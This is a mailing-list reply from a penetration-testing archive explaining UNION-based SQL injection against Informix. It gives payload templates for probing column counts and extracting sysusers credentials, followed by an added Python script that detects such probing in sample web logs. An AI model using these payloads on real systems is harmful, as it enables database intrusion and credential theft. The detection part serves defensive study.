Penetration Testing mailing list archives

Re: SQL Injection with Informix


From: Martin Eiszner <martin () websec org>
Date: Thu, 4 Jul 2002 09:45:06 +0200


On Wed, 3 Jul 2002 16:28:18 -0600 
"Whyte, Jesse" <Jesse.Whyte () us gambro com> wrote:

http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%20usertype%20FROM%20sysusers
[Informix][Informix ODBC Driver][Informix]Corresponding column types must be
compatible for each UNION statement.

..........................


hola, 

i never did a test on informix .. but ...


The first test (queries) should be something like:
(using "1" should satisfy all different data types for all the other fields)

check out a standard-table with many fields (or something like "dual" on oracle ..)

---*---
union select '1' from [TABLEX];--
union select '1','1' from [TABLEX];--
union select '1','1','1' from [TABLEX];--
union select '1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1','1' from [TABLEX];--

(and so on ...)
---*---

(using "1" should satisfy all different data types for all the other fields)

.. you know that you hit the right column-number when there is no 
more error-message .. 


username and usertype could be concatenated "username||usertype" (check the "concat"-syntax for informix).
so there is only one char, varchar, text(or similar) field left that you 
have to "hit directly".

now try to brute-force any proper "query-signature" of the union statement:

---*---

union select '1',(username||usertype),['1'xnumber of fields] from sysusers;-- 
union select '1','1',(username||usertype),['1'xnumber of fields -1 ] from sysusers;-- 
union select '1','1','1',(username||usertype),['1'xnumber of fields -2 ] from sysusers;-- 
union select '1','1','1','1',(username||usertype),['1'xnumber of fields -3 ] from sysusers;-- 
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields - 4] from sysusers;-- 
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields -5 ] from sysusers;-- 

(and so on ...)

---*---

check the response for differences ... that should do the trick ...


another possibility is "typecasting" every field within the result-set into 1 type ("text" for example).
(check out your informix-manual for the correct syntax). 

the only thing you have to guess (brute-force) with this method, is the number of fields in the result-set.



hope that helps, nice day,

martin


mei () websec org
http://www.websec.org
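Added example, not part of Martin's message or the original thread: the column-count probing sequence described above leaves a recognisable trail in a web server's access log, namely a run of UNION SELECT requests from one client whose select-list grows by one item each time. This Python script, using constructed log lines with made-up addresses and paths, decodes each request target, counts the select-list items, and flags clients that tried several different column counts.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); the client
# addresses, paths and timestamps are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jul/2002:09:45:06 +0200] "GET /default.cfm?var=17 HTTP/1.0" 200 2311
10.0.0.5 - - [04/Jul/2002:09:45:09 +0200] "GET /default.cfm?var='UNION%20SELECT%20'1'%20FROM%20systables;-- HTTP/1.0" 500 214
10.0.0.5 - - [04/Jul/2002:09:45:11 +0200] "GET /default.cfm?var='UNION%20SELECT%20'1'%2C'1'%20FROM%20systables;-- HTTP/1.0" 500 214
10.0.0.5 - - [04/Jul/2002:09:45:13 +0200] "GET /default.cfm?var='UNION%20SELECT%20'1'%2C'1'%2C'1'%20FROM%20systables;-- HTTP/1.0" 200 2590
10.0.0.9 - - [04/Jul/2002:09:46:00 +0200] "GET /search.cfm?q=union%20station HTTP/1.0" 200 1800
"""

# Client IP, request target and status code of one CLF line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The select-list between UNION [ALL] SELECT and FROM, case-insensitive.
UNION_RE = re.compile(r'union\s+(?:all\s+)?select\s+(?P<cols>.+?)\s+from\b',
                      re.IGNORECASE | re.DOTALL)


def union_column_count(target):
    """Number of select-list items in a UNION SELECT found in the decoded
    request target, or None if the target carries no UNION SELECT."""
    decoded = unquote_plus(unquote_plus(target))  # tolerate double encoding
    m = UNION_RE.search(decoded)
    if not m:
        return None
    depth, count = 0, 1
    for ch in m.group('cols'):           # count top-level commas only, so a
        if ch == '(':                    # concatenation like (a||b) is one item
            depth += 1
        elif ch == ')':
            depth -= 1
        elif ch == ',' and depth == 0:
            count += 1
    return count


def find_union_probes(log_text, min_distinct=3):
    """Group UNION SELECT requests by client IP as (column_count, status)
    pairs and return the clients that tried >= min_distinct column counts."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        n = union_column_count(m.group('target'))
        if n is not None:
            seen[m.group('ip')].append((n, int(m.group('status'))))
    return {ip: p for ip, p in seen.items() if len({n for n, _ in p}) >= min_distinct}
```

The status column also shows the transition Martin describes: errors (500) while the column count is wrong, then a normal page (200) once it matches.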